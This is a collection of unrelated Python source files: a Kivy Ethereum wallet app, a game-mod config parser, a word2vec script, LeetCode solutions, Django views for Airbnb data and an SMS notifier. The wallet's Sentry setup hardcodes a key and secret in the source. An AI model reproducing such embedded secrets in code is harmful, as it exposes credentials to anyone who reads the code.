\"\"\"\n Changes pywalib default keystore path depending on platform.\n Currently only updates it on Android.\n \"\"\"\n if platform != \"android\":\n return\n import pywalib\n # uses kivy user_data_dir (/sdcard/)\n pywalib.KEYSTORE_DIR_PREFIX = App.get_running_app().user_data_dir\n\n @classmethod\n def get_keystore_path(cls):\n \"\"\"\n This is the Kivy default keystore path.\n \"\"\"\n keystore_path = os.environ.get('KEYSTORE_PATH')\n if keystore_path is None:\n Controller.patch_keystore_path()\n keystore_path = PyWalib.get_default_keystore_path()\n return keystore_path\n\n @staticmethod\n def get_store_path():\n \"\"\"\n Returns the full user store path.\n \"\"\"\n user_data_dir = App.get_running_app().user_data_dir\n store_path = os.path.join(user_data_dir, 'store.json')\n return store_path\n\n @classmethod\n def get_store(cls):\n \"\"\"\n Returns the full user Store object instance.\n \"\"\"\n store_path = cls.get_store_path()\n store = JsonStore(store_path)\n return store\n\n @classmethod\n def delete_account_alias(cls, account):\n \"\"\"\n Deletes the alias for the given account.\n \"\"\"\n address = \"0x\" + account.address.encode(\"hex\")\n store = cls.get_store()\n alias_dict = store['alias']\n alias_dict.pop(address)\n store['alias'] = alias_dict\n\n @classmethod\n def set_account_alias(cls, account, alias):\n \"\"\"\n Sets an alias for a given Account object.\n Deletes the alias if empty.\n \"\"\"\n # if the alias is empty and an alias exists for this address,\n # deletes it\n if alias == '':\n try:\n cls.delete_account_alias(account)\n except KeyError:\n pass\n return\n address = \"0x\" + account.address.encode(\"hex\")\n store = cls.get_store()\n try:\n alias_dict = store['alias']\n except KeyError:\n # creates store if doesn't yet exists\n store.put('alias')\n alias_dict = store['alias']\n alias_dict.update({address: alias})\n store['alias'] = alias_dict\n\n @classmethod\n def get_address_alias(cls, address):\n \"\"\"\n Returns the alias of the given address string.\n \"\"\"\n store = 
cls.get_store()\n return store.get('alias')[address]\n\n @classmethod\n def get_account_alias(cls, account):\n \"\"\"\n Returns the alias of the given Account object.\n \"\"\"\n address = \"0x\" + account.address.encode(\"hex\")\n return cls.get_address_alias(address)\n\n @staticmethod\n def src_dir():\n return os.path.dirname(os.path.abspath(__file__))\n\n @classmethod\n def on_dialog_dismiss(cls, dialog):\n \"\"\"\n Removes it from the dialogs track list.\n \"\"\"\n with cls.__lock:\n try:\n cls.dialogs.remove(dialog)\n except ValueError:\n # fails silently if the dialog was dismissed twice, refs:\n # https://github.com/AndreMiras/PyWallet/issues/89\n pass\n\n @classmethod\n def dismiss_all_dialogs(cls):\n \"\"\"\n Dispatches dismiss event for all dialogs.\n \"\"\"\n # keeps a local copy since we're altering them as we iterate\n dialogs = cls.dialogs[:]\n for dialog in dialogs:\n dialog.dispatch('on_dismiss')\n\n @classmethod\n def create_dialog_helper(cls, title, body):\n \"\"\"\n Creates a dialog from given title and body.\n Adds it to the dialogs track list.\n \"\"\"\n content = MDLabel(\n font_style='Body1',\n theme_text_color='Secondary',\n text=body,\n size_hint_y=None,\n valign='top')\n content.bind(texture_size=content.setter('size'))\n dialog = MDDialog(\n title=title,\n content=content,\n size_hint=(.8, None),\n height=dp(250),\n auto_dismiss=False)\n dialog.bind(on_dismiss=cls.on_dialog_dismiss)\n with cls.__lock:\n cls.dialogs.append(dialog)\n return dialog\n\n @classmethod\n def create_dialog(cls, title, body):\n \"\"\"\n Creates a dialog from given title and body.\n Adds it to the dialogs track list.\n Appends dismiss action.\n \"\"\"\n dialog = cls.create_dialog_helper(title, body)\n dialog.add_action_button(\n \"Dismiss\",\n action=lambda *x: dialog.dismiss())\n return dialog\n\n @classmethod\n def on_balance_connection_error(cls):\n title = \"Network error\"\n body = \"Couldn't load balance, no network access.\"\n dialog = cls.create_dialog(title, body)\n dialog.open()\n\n @classmethod\n def on_balance_value_error(cls):\n title = \"Decode error\"\n body = \"Couldn't decode balance data.\"\n dialog = cls.create_dialog(title, body)\n dialog.open()\n\n @classmethod\n def on_balance_unknown_error(cls):\n title = \"Unknown error\"\n body = \"Unknown error while fetching balance.\"\n dialog = cls.create_dialog(title, body)\n dialog.open()\n\n @classmethod\n def on_history_connection_error(cls):\n title = \"Network error\"\n body = \"Couldn't load history, no network access.\"\n dialog = cls.create_dialog(title, body)\n dialog.open()\n\n @classmethod\n def on_history_value_error(cls):\n title = \"Decode error\"\n body = \"Couldn't decode history data.\"\n dialog = cls.create_dialog(title, body)\n dialog.open()\n\n @mainthread\n def update_toolbar_title_balance(self, instance=None, value=None):\n if self.current_account is None:\n return\n address = '0x' + self.current_account.address.encode(\"hex\")\n try:\n balance = self.accounts_balance[address]\n except KeyError:\n balance = 0\n title = \"%s ETH\" % (balance)\n self.set_toolbar_title(title)\n\n @staticmethod\n @mainthread\n def snackbar_message(text):\n Snackbar(text=text).show()\n\n def load_landing_page(self):\n \"\"\"\n Loads the landing page.\n \"\"\"\n try:\n # will trigger account data fetching\n self.current_account = self.pywalib.get_main_account()\n if SCREEN_SWITCH_DELAY:\n Clock.schedule_once(\n lambda dt: self.screen_manager_current('overview'),\n SCREEN_SWITCH_DELAY)\n else:\n self.screen_manager_current('overview')\n except IndexError:\n self.load_create_new_account()\n
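\n # Note (added): fetch_balance() below writes into the accounts_balance\n # DictProperty; Kivy dispatches the change to bound observers (e.g. the\n # toolbar title), which is how cached balances reach the UI.\n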
\n @run_in_thread\n def fetch_balance(self):\n \"\"\"\n Fetches the new balance & sets accounts_balance property.\n \"\"\"\n if self.current_account is None:\n return\n address = '0x' + self.current_account.address.encode(\"hex\")\n try:\n balance = PyWalib.get_balance(address)\n except ConnectionError:\n Controller.on_balance_connection_error()\n Logger.warning('ConnectionError', exc_info=True)\n return\n except ValueError:\n # most likely the JSON object could not be decoded, refs #91\n # currently logged as an error, because we want more insight\n # in order to eventually handle it more specifically\n Controller.on_balance_value_error()\n Logger.error('ValueError', exc_info=True)\n return\n except UnknownEtherscanException:\n # also handles unknown errors, refs #112\n Controller.on_balance_unknown_error()\n Logger.error('UnknownEtherscanException', exc_info=True)\n return\n # triggers accounts_balance observers update\n self.accounts_balance[address] = balance\n\n def on_update_alias_clicked(self, dialog, alias):\n account = self.current_account\n Controller.set_account_alias(account, alias)\n # makes sure widgets that already rendered the address get updated\n self.dispatch('on_alias_updated', alias)\n dialog.dismiss()\n\n def on_alias_updated(self, *args):\n pass\n\n def prompt_alias_dialog(self):\n \"\"\"\n Prompts the update alias dialog.\n \"\"\"\n account = self.current_account\n title = \"Update your alias\"\n content = AliasForm(account)\n dialog = MDDialog(\n title=title,\n content=content,\n size_hint=(.8, None),\n height=dp(250),\n auto_dismiss=False)\n # workaround for MDDialog container size (too small by default)\n dialog.ids.container.size_hint_y = 1\n dialog.add_action_button(\n \"Update\",\n action=lambda *x: self.on_update_alias_clicked(\n dialog, content.alias))\n dialog.open()\n\n def copy_address_clipboard(self):\n \"\"\"\n Copies the current account address to the clipboard.\n \"\"\"\n account = self.current_account\n address = \"0x\" + account.address.encode(\"hex\")\n Clipboard.copy(address)\n\n def open_address_options(self):\n \"\"\"\n Loads the address options bottom sheet.\n \"\"\"\n bottom_sheet = MDListBottomSheet()\n bottom_sheet.add_item(\n 'Switch account',\n lambda x: self.load_switch_account(), icon='swap-horizontal')\n bottom_sheet.add_item(\n 'Change alias',\n lambda x: self.prompt_alias_dialog(), icon='information')\n bottom_sheet.add_item(\n 'Copy address',\n lambda x: self.copy_address_clipboard(), icon='content-copy')\n bottom_sheet.open()\n\n def select_overview_subtab(self):\n \"\"\"\n Selects the overview sub tab.\n \"\"\"\n # this is what we would normally do:\n # tab_manager.current = 'overview'\n # but instead we need to simulate the click on the\n # navigation bar children or the associated screen button\n # would not have the selected color\n overview_bnavigation = self.overview_bnavigation\n navigation_bar = overview_bnavigation.children[0]\n boxlayout = navigation_bar.children[0]\n nav_headers = boxlayout.children\n # the overview is the first/last button\n overview_nav_header = nav_headers[-1]\n overview_nav_header.dispatch('on_press')\n\n def load_switch_account(self):\n \"\"\"\n Loads the switch account screen.\n \"\"\"\n # loads the switch account screen\n Clock.schedule_once(\n lambda dt: self.screen_manager_current(\n 'switch_account', direction='left'),\n SCREEN_SWITCH_DELAY)\n
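\n # Note (added): as in load_switch_account() above, screen switches are\n # deferred by SCREEN_SWITCH_DELAY so the current frame can render first\n # (refs #122); load_create_new_account() below temporarily disables the delay.\n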
manage keystores screen.\n        \"\"\"\n        # loads the manage keystores screen\n        if SCREEN_SWITCH_DELAY:\n            Clock.schedule_once(\n                lambda dt: self.screen_manager_current(\n                    'manage_keystores', direction='left'),\n                SCREEN_SWITCH_DELAY)\n        else:\n            self.screen_manager_current(\n                'manage_keystores', direction='left')\n\n    def load_create_new_account(self):\n        \"\"\"\n        Loads the create new account tab from the manage keystores screen.\n        \"\"\"\n        # we need the screen now\n        global SCREEN_SWITCH_DELAY\n        saved_delay = SCREEN_SWITCH_DELAY\n        SCREEN_SWITCH_DELAY = None\n        self.load_manage_keystores()\n        SCREEN_SWITCH_DELAY = saved_delay\n        # loads the create new account tab\n        manage_keystores = self.manage_keystores\n        create_new_account_nav_item = \\\n            manage_keystores.ids.create_new_account_nav_item_id\n        create_new_account_nav_item.dispatch('on_tab_press')\n\n    def load_flash_qr_code(self):\n        \"\"\"\n        Loads the flash QR Code screen.\n        \"\"\"\n        # loads ZBarCam only when needed, refs:\n        # https://github.com/AndreMiras/PyWallet/issues/94\n        from zbarcam import ZBarCam  # noqa\n        # loads the flash QR Code screen\n        self.screen_manager_current('flashqrcode', direction='left')\n\n    def load_about_screen(self):\n        \"\"\"\n        Loads the about screen.\n        \"\"\"\n        Clock.schedule_once(\n            lambda dt: self.screen_manager_current('about', direction='left'),\n            SCREEN_SWITCH_DELAY)\n\n\nclass DebugRavenClient(object):\n    \"\"\"\n    The DebugRavenClient should be used in debug mode, it just raises\n    the exception rather than capturing it.\n    \"\"\"\n\n    def captureException(self):\n        raise\n\n\nclass PyWalletApp(App):\n    theme_cls = ThemeManager()\n\n    def build(self):\n        self.icon = \"docs/images/icon.png\"\n        return Controller(info='PyWallet')\n\n    @property\n    def controller(self):\n        return self.root\n\n\ndef configure_sentry(in_debug=False):\n    \"\"\"\n    Configure the Raven client, or create a dummy one if `in_debug` is `True`.\n    \"\"\"\n    key = 'eaee971c463b49678f6f352dfec497a9'\n    # the public DSN URL is not available on the Python client\n    # so we're exposing the secret and will be revoking it on abuse\n    # https://github.com/getsentry/raven-python/issues/569\n    secret = '4f37fdbde03a4753b78abb84d11f45ab'\n    project_id = '191660'\n    dsn = 'https://{key}:{secret}@sentry.io/{project_id}'.format(\n        key=key, secret=secret, project_id=project_id)\n    if in_debug:\n        client = DebugRavenClient()\n    else:\n        client = Client(dsn=dsn, release=__version__)\n        # adds context for Android devices\n        if platform == 'android':\n            from jnius import autoclass\n            Build = autoclass(\"android.os.Build\")\n            VERSION = autoclass('android.os.Build$VERSION')\n            android_os_build = {\n                'model': Build.MODEL,\n                'brand': Build.BRAND,\n                'device': Build.DEVICE,\n                'manufacturer': Build.MANUFACTURER,\n                'version_release': VERSION.RELEASE,\n            }\n            client.user_context({'android_os_build': android_os_build})\n        # Logger.error() to Sentry\n        # https://docs.sentry.io/clients/python/integrations/logging/\n        handler = SentryHandler(client)\n        handler.setLevel(LOG_LEVELS.get('error'))\n        setup_logging(handler)\n    return client\n\n\nif __name__ == '__main__':\n    # when the -d/--debug flag is set, Kivy sets log level to debug\n    level = Logger.getEffectiveLevel()\n    in_debug = level == LOG_LEVELS.get('debug')\n    client = configure_sentry(in_debug)\n    try:\n        PyWalletApp().run()\n    except:\n        if type(client) == Client:\n            Logger.info(\n                'Errors will be sent to Sentry, run with \"--debug\" if you '\n                'are a developer and want to see the error in the shell.')\n            
client.captureException()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":55359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55707901","text":"import os\nimport re\nimport sys\n\n\nclass Mod(object):\n\n    def __init__(self):\n        self.root = self.find_mod_root()\n\n    def find_mod_root(self):\n        workdir_parts = os.getcwd().split(os.sep)\n        return os.sep.join(\n            workdir_parts[:workdir_parts.index('mods') + 2])\n\n    def get_object_path(self, name):\n        for dirname, dirnames, filenames in os.walk(\n                os.path.join(self.root, 'objects')):\n            for filename in filenames:\n                if filename.split('.')[-1] in ['con', 'tweak']:\n                    # dirname from os.walk is already the full directory path\n                    filepath = os.path.join(dirname, filename)\n                    root = TemplateParser(filepath).get_root()\n                    if root is not None and root[1] == name:\n                        return filepath\n\n\n\n# ############################################### #\n# !!!untested code leftover from materials parser #\nclass TemplateParser:\n    # regex from mats\n    # ObjectTemplate.(create|activeSafe) \n\n    def __init__(self, filepath):\n        self.path_object_folder = self.get_root_folder(filepath)\n        self.path_object_template = filepath\n        self.object_types_list = [\n            'PlayerControlObject',\n            'Wing',\n            'Wheel',\n            'Spring',\n            'RotationalBundle',\n            'Engine',\n            'SimpleObject'\n        ]\n\n    def get_root_folder(self, filepath):\n        path, filename = os.path.split(filepath)\n        return path\n\n    def get_root(self):\n        object_types_string = '|'.join(self.object_types_list)\n        pattern1 = r'ObjectTemplate.create (' + object_types_string + ') (\w)+'\n        with open(self.path_object_template) as confile:\n            for line in confile:\n                match = re.search(pattern1, line)\n                if match:\n                    # first match is our object\n                    type = match.group().split(' ')[1]\n                    name = match.group().split(' ')[2]\n                    return (type, name)\n\n    def get_child_list(self):\n        child_list = []\n        object_types_string = '|'.join(self.object_types_list)\n        pattern1 = r'ObjectTemplate.create (' + object_types_string + ') (\w)+'\n        pattern2 = r'include (\w)+.tweak'\n        with open(self.path_object_template) as confile:\n            for line in confile:\n                match = re.search(pattern1, line)\n                if match:\n                    child_list.append(match.group())\n                match = re.search(pattern2, line)\n                if match:\n                    with open(os.path.join(self.path_object_folder, match.group().split(' ')[1])) as tweakfile:\n                        for line in tweakfile:\n                            match = re.search(pattern1, line)\n                            if match:\n                                child_list.append(match.group())\n        return child_list\n\n    def get_wings(self):\n        wings = []\n        pattern1 = r'ObjectTemplate.(create|activeSafe) Wing (\w)+'\n        pattern2 = r'include (\w)+.tweak'\n        pattern3 = r'(ObjectTemplate.(create|activeSafe) Wing (\w)+)|(ObjectTemplate.setWingLift ([-+]?\d*\.\d+|\d+))|(ObjectTemplate.setFlapLift ([-+]?\d*\.\d+|\d+))'\n        with open(self.path_object_template) as confile:\n            for line in confile:\n                match = re.search(pattern2, line)\n                if match:\n                    with open(os.path.join(self.path_object_folder, match.group().split(' ')[1])) as tweakfile:\n                        '''\n                        for id, line in enumerate(tweakfile.readlines()):\n                            match = re.search(pattern1, line)\n                            if match:\n                                wing_name = match.group().split(' ')[2]\n                                wing = Wing(wing_name)\n                                #wing.lift_wing =\n                        '''\n                        # whole file test\n                        for line in tweakfile.readlines():\n                            match = re.search(pattern3, line)\n                            if match:\n                                print(match.group())\n\n\nclass Materials:\n    # MaterialManager.createCell 1 18\n    # MaterialManager.damageMod 1\n\n    class Material:\n\n        def __init__(self, id):\n            self.id = id\n            self.name = None\n            self.damage_mod = {}\n\n        def 
__eq__(self, other):\n            return self.id == other.id\n\n        def __hash__(self):\n            return hash(self.id)\n\n    def __init__(self, filepath):\n        self.cells = self.parse_settings(filepath)\n\n    def parse_settings(self, filepath):\n        cells = {}\n        with open(filepath) as fo:\n            matches = re.finditer(\n                r'MaterialManager.createCell (\d+) (\d+)\nMaterialManager.damageMod ((\d+\.\d+)|(\d+))',\n                fo.read())\n            for match in matches:\n                #pattern_cell = r'MaterialManager.createCell (\d+) (\d+)'\n                #match_cell = re.match(pattern_cell, match.group())\n                mat_id_attacker, mat_id_target = int(\n                    match.group(1)), int(match.group(2))\n                attacker = self.Material(mat_id_attacker)\n                if attacker.id not in cells:\n                    cells[attacker.id] = attacker\n                if mat_id_target not in cells[attacker.id].damage_mod:\n                    cells[attacker.id].damage_mod[\n                        mat_id_target] = float(match.group(3))\n        return cells\n\n\nclass GameObject:\n\n    def __init__(self, name):\n        self.name = name\n        self.type = None\n        self.childs = []\n        self.childs_created = []\n        self.mapped_materials = {}\n\n    def loadFromCon(self, path_confile):\n        parser = TemplateParser(path_confile)\n        self.type, self.name = parser.get_root()\n        self.childs_created = parser.get_child_list()\n        # print(self.childs_created)\n\n\nclass Jet:\n\n    def __init__(self):\n        self.name = None\n        self.type = None\n        self.wings = []\n\n    def loadFromCon(self, path_confile):\n        parser = TemplateParser(path_confile)\n        self.type, self.name = parser.get_root()\n        self.wings = parser.get_wings()\n\n\nclass Wing():\n\n    def __init__(self, name):\n        self.name = name\n        self.lift_wing = 0\n        self.lift_flap = 0\n","sub_path":"deprecated/bf2.py","file_name":"bf2.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"429345474","text":"\"\"\"\nAPI at https://radimrehurek.com/gensim/models/word2vec.html\ntutorial at https://blog.cambridgespark.com/tutorial-build-your-own-embedding-and-use-it-in-a-neural-network-e9cde4a81296\n\n\n\"\"\"\nfrom gensim.models import Word2Vec\nimport spacy\nimport os\n\ntrain_set = []\n\n# get entire corpus\nrootdir = './Datasets'\ncorpus = []\nnlp = spacy.load(\"en_core_web_sm\", disable=[\"ner\"])\nfor subdir, dirs, files in os.walk(rootdir):\n    for file in files:\n        if file != '.DS_Store':\n            with open(os.path.join(subdir, file), 'r') as f:\n                lines = f.readlines()\n                text = \"\".join(lines[5:])\n                text = text.lower()\n                text = text.replace(\")[\", \") \")\n                text = text.replace(\"\\n\", \" \")\n                text = text.replace(\".)\", \". 
\")\n doc = nlp(text)\n sentences = doc.sents\n for sentence in sentences:\n corpus.append([str(token) for token in list(sentence.__iter__())])\n\nw2v = Word2Vec(corpus, size=300, window=4, min_count=3, negative=15, iter=20)\n\nword_vectors = w2v.wv\nresult = word_vectors.similar_by_word(\"picard\")\nprint(result)\nw2v.save('trek_w2v.model')\n\n#odel = Word2Vec.load('trek_w2v_fics.model')\n#vectors = model.wv\n#print(vectors.similar_by_word(\"vulcan\"))\n\n\n","sub_path":"get_word2vec.py","file_name":"get_word2vec.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"367382512","text":"DEFAULT_SCREEN_SIZE = (800, 600)\nDEFAULT_PLAYER_SPEED = 10\nDEFAULT_BALL_SPEED = 40.0\nDEFAULT_MAX_BALL_SPEED = 100.0\nDEFAULT_BALL_ACCELERATION = 5\nDEFAULT_OBJECT_HP_COUNT = 2\nPLAYER_COLOR = (0, 255, 0)\nBALL_COLOR = (255, 255, 255)\nBALL_RADIUS = 10\nPLAYER_START_POSITION = (300, 550)\nPLAYER_SIZE = (200, 15)\nCOLOR_BLACK = (0, 0, 0)\nMAX_GAME_FPS = 60.0\nTARGETS_IN_ROW = 4\nNUMBER_OF_ROWS = 4\nPOINTS_FOR_BLOCK = 10\nNEW_BALL_SPAWN_ON_POINTS = 50\nMOVEMENT_AFTER_HIT = 6\nNEW_BALL_START_POINT = (720, 480)\n","sub_path":"ball bounce game/gameConfig.py","file_name":"gameConfig.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"537960643","text":"class Solution(object):\n def countSubstrings(self, S):#copy\n N = len(S)\n ans = 0\n for center in range(2*N - 1):\n left = center / 2 #0-【0,0】 1:[0,1]扩展 2-【1,1】 3-【1,2】\n right = left + center % 2 #left和right获取难点\n while left >= 0 and right < N and S[left] == S[right]:# 回文区间 `[a, b]`则[a+1,b-1]递归回文\n ans += 1\n left -= 1\n right += 1\n return ans\n#马拉车算法可以在线性时间内找出以任何位置为中心的最大回文串。\n\n#\nclass Solution(object):\n def countSubstrings(self, s):#copy\n dp=[[0]*len(s) for _ in range(len(s))]\n res=0\n for j in range(len(s)):\n for i in range(j+1):\n if s[i]==s[j] and (j-i<2 or dp[i+1][j-1]):\n dp[i][j]=1\n res+=1\n return res\n\n\n# 给你一个字符串 s ,请你统计并返回这个字符串中 回文子串 的数目。\n\n# 回文字符串 是正着读和倒过来读一样的字符串。\n\n# 子字符串 是字符串中的由连续字符组成的一个序列。\n\n# 具有不同开始位置或结束位置的子串,即使是由相同的字符组成,也会被视作不同的子串。\n\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode.cn/problems/palindromic-substrings\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。","sub_path":"leetcode_solution/leetcode类别/10字符串/中等/5-647. 回文子串.py","file_name":"5-647. 
回文子串.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"364750182","text":"import json\n\nfrom bokeh.embed import components\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.plotting import figure\nfrom bokeh.transform import jitter\nfrom django.shortcuts import render\nfrom airbnb_analysis.modeling import myWordCloud, embedding\nfrom geopy.geocoders import Nominatim\nimport joblib\nimport numpy as np\n\ndef index(request):\n return render(request, \"index.html\")\n\n\ndef map(request):\n # city = request.GET.get('city')\n # if city:\n data_path = './new_york.json'\n json_data = open(data_path)\n data = json.loads(json_data.read())\n ret = []\n for element in data:\n ret.append({'name': element['listing_name'],\n 'lat': element['lat'],\n 'lng': element['lng'],\n 'reviews': element['reviews_count'],\n 'prices': element['price']})\n json_data.close()\n data = json.dumps(ret)\n return render(request, \"home.html\", {'data': data})\n\n\ndef wordmap(request):\n city = request.GET.get('city')\n room_type = request.GET.get('room type')\n picture_src = None\n if city:\n data_path = './new_york.json'\n picture_src = myWordCloud.wordCloud(data_path, room_type)\n return render(request, \"wordcloud.html\", {'data':picture_src})\n\n\ndef prediction(request):\n address = request.GET.get('address')\n if address:\n name = request.GET.get('name')\n name_vec = embedding.name2Vec(name)\n geolocator = Nominatim(user_agent=\"airbnb analysis\")\n location = geolocator.geocode(address)\n min_nights = int(request.GET.get('min_nights'))\n max_nights = int(request.GET.get('max_nights'))\n price = int(request.GET.get('price'))\n person_capacity = int(request.GET.get('person_capacity'))\n bedrooms = int(request.GET.get('bedrooms'))\n bathrooms = int(request.GET.get('bathrooms'))\n can_instant_book = request.GET.get('can_instant_book') == '1'\n is_superhost = request.GET.get('is_superhost') == '1'\n room_type_category = request.GET.get('room_type_category')\n room_type_category_entire_home = int(room_type_category == '0')\n room_type_category_hotel_room = int(room_type_category == '1')\n room_type_category_private_room = int(room_type_category == '2')\n room_type_category_shared_room = int(room_type_category == '3')\n pipe = joblib.load('./airbnb_analysis/modeling/random_forest.joblib')\n pr_list = [location.latitude, location.longitude,\n min_nights, max_nights,\n price, person_capacity, bedrooms, bathrooms,\n can_instant_book, is_superhost] + list(name_vec) + \\\n [room_type_category_entire_home, room_type_category_hotel_room,\n room_type_category_private_room, room_type_category_shared_room]\n print(pr_list)\n pr_list = np.array(pr_list).reshape(1, -1)\n result = pipe.predict(pr_list)\n else:\n result = 'Please enter the information'\n return render(request, \"prediction.html\", {'result': result})\n\n\ndef analysis(request):\n feature_name = request.GET.get('feature')\n feature_names = [\"bedrooms\", \"bathrooms\", \"room_type_category\"]\n data_path = './new_york.json'\n json_data = open(data_path)\n data = json.loads(json_data.read())\n prices = []\n category = []\n if not feature_name:\n feature_name = 'bedrooms'\n for element in data:\n if element[feature_name] is not None:\n prices.append(element['price'])\n category.append(element[feature_name])\n json_data.close()\n data = {'prices': prices,\n 'category': category}\n source = ColumnDataSource(data=data)\n cats = list(set(category))\n cats = [str(c) for c 
in sorted(cats)]\n p = figure(plot_width=800, plot_height=800, y_range=cats,\n title=\"Rent by Category\")\n p.circle(x='prices', y=jitter('category', width=0.6, range=p.y_range), alpha=0.3, source=source)\n p.x_range.range_padding = 0\n p.ygrid.grid_line_color = None\n script, div = components(p)\n return render(request, \"analysis.html\", {'script': script, 'div': div, 'feature_names': feature_names,\n \"current_feature_name\": feature_name})\n","sub_path":"airbnb_analysis/airbnb_analysis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577255124","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.io import wavfile\nimport os\nimport math\n\nplt.style.use('seaborn')\nOUT_PATH = 'output'\n\nclass wavFile():\n\n '''\n Args:\n filename (str): name of .wav file to be loaded.\n '''\n\n def __init__(self, filename):\n self._rate, self._audio_data = wavfile.read(filename)\n self._n = len(self._audio_data)\n self.fft()\n\n def fft(self):\n self.modulus = abs(np.fft.rfft(self._audio_data) / self._n)\n self.argument = np.angle(np.fft.rfft(self._audio_data) / self._n)\n\n def plot_time(self, save_fname=None):\n time = np.arange(0, self._n)/self._rate\n\n plt.clf()\n plt.plot(time, self._audio_data)\n plt.title('Audio')\n plt.xlabel('Time [s]')\n if save_fname:\n plt.savefig(os.path.join(OUT_PATH, save_fname))\n print('Figure saved to {}'.format(os.path.join(OUT_PATH, save_fname)))\n plt.show()\n\n def plot_modulus(self, save_fname=None):\n freq = np.arange(self._n) * (self._rate / self._n)\n freq = freq[range(self._n // 2 + 1)]\n\n plt.clf()\n plt.plot(freq, self.modulus)\n plt.title('Modulus')\n plt.ylabel('Amplitude')\n plt.xlabel('Frequency [Hz]')\n if save_fname:\n plt.savefig(os.path.join(OUT_PATH, save_fname))\n print('Figure saved to {}'.format(os.path.join(OUT_PATH, save_fname)))\n plt.show()\n\n def plot_argument(self, save_fname=None):\n freq = np.arange(self._n) * (self._rate / self._n)\n freq = freq[range(self._n // 2 + 1)]\n\n plt.clf()\n plt.plot(freq[:50], self.argument[:50]/math.pi) # showing first 50 frequencies to have readable plot\n plt.title('Argument')\n plt.ylabel('Phase/π')\n plt.xlabel('Frequency [Hz]')\n if save_fname:\n plt.savefig(os.path.join(OUT_PATH, save_fname))\n print('Figure saved to {}'.format(os.path.join(OUT_PATH, save_fname)))\n plt.show()\n\n def save_file(self, save_fname):\n wavfile.write(os.path.join(OUT_PATH, save_fname), 44100, self._audio_data) #saving data with standard 44,1kHz\n print('Audio saved to {}'.format(os.path.join(OUT_PATH, save_fname)))\n\n @property\n def sample_rate(self):\n return self._rate\n\n @property\n def audio_data(self):\n return self._audio_data\n\n @audio_data.setter\n def audio_data(self, value):\n self._audio_data = value\n self.fft()\n","sub_path":"wavFile.py","file_name":"wavFile.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"646408350","text":"from core.advbase import *\n\ndef module():\n return Heinwald\n\nclass Heinwald(Adv):\n conf = {}\n conf['slots.a'] = [\n 'Resounding_Rendition',\n 'Flash_of_Genius',\n 'Howling_to_the_Heavens',\n 'The_Plaguebringer',\n 'A_Small_Courage'\n ]\n conf['acl'] = \"\"\"\n `dragon(c3-s-end),x=5\n queue prep and not buff(s3)\n `s3;s1;s4;s2\n end\n `s4\n `s1\n `s2, cancel\n \"\"\"\n conf['coabs'] = ['Blade','Wand','Bow']\n conf['share.base'] = 
['Kleimann']\n    conf['share.poison'] = ['Curran']\n\n\nif __name__ == '__main__':\n    from core.simulate import test_with_argv\n    import sys  # sys is not imported at module level in this file\n    test_with_argv(None, *sys.argv)\n","sub_path":"adv/heinwald.py","file_name":"heinwald.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"224276999","text":"import os\n\nfrom flask import render_template\n\nfrom libapp import app, dovesoft\nfrom libapp.config import smsconf\nfrom libapp.dovesoft.exceptions import DoveSoftClientError\n\nfrom .notifications import Notification\n\nds = dovesoft.DoveSoftClient(smsconf.USERNAME, smsconf.KEY)\n\n\nclass Sms(Notification):\n\n    def __init__(self, **kwargs):\n        super(Sms, self).__init__(**kwargs)\n\n    def get_templates(self, template_name, **kwargs):\n        \"\"\"\n        Get text templates for sms\n        \"\"\"\n        text = render_template(\"{template}.txt\".format(template=template_name), **kwargs)\n        return text\n\n    def get_message(self, **kwargs):\n        \"\"\"\n        Get message object for sms\n        \"\"\"\n        message = dovesoft.Sms()\n\n        for key in kwargs.keys():\n            if key not in kwargs.get(\"ignore\", smsconf.IGNORE_KEYS):\n                fun = getattr(message, \"set_{key}\".format(key=key))\n                fun(kwargs.get(key, \"\"))\n\n        return message\n\n    def send_message(self, message):\n        \"\"\"\n        Send message to receiver via gateway\n        \"\"\"\n        try:\n            resp = ds.send(message)\n            app.logger.info(\"Successfully sent message: {msg}\".format(msg=resp))\n            return resp\n        except DoveSoftClientError as sgce:\n            # 'resp' is never bound when send() raises, so log the exception instead\n            app.logger.error(\"Error while sending sms: {msg}\".format(msg=sgce))\n            app.logger.error(\"Sms: {message}\".format(message=message))\n            raise DoveSoftClientError(sgce.code, sgce.read())\n\n    def message_notifier(self, **kwargs):\n        \"\"\"\n        Message notifier helper to send message\n        \"\"\"\n        if all(key in kwargs for key in [\"msg_type\", \"author\", \"category\"]):\n            template_name = os.path.join(kwargs.get(\"msg_type\", \"\"), kwargs.get(\"author\", \"\"),\n                                         kwargs.get(\"category\", \"\"), kwargs.get(\"template\", \"\"))\n            kwargs = self.del_keys(kwargs.get(\"delete\", smsconf.DELETE_KEYS), **kwargs)\n            text = self.get_templates(template_name=template_name, **kwargs)\n            message = self.get_message(message=text, **kwargs)\n            resp = self.send_message(message)\n            app.logger.info(\"{error} with {res}\".format(error=resp[0], res=str(resp[1]).strip(\"\\r\\n\").rstrip(\"\\n\\n\")))\n        else:\n            app.logger.error(\"No template data available: 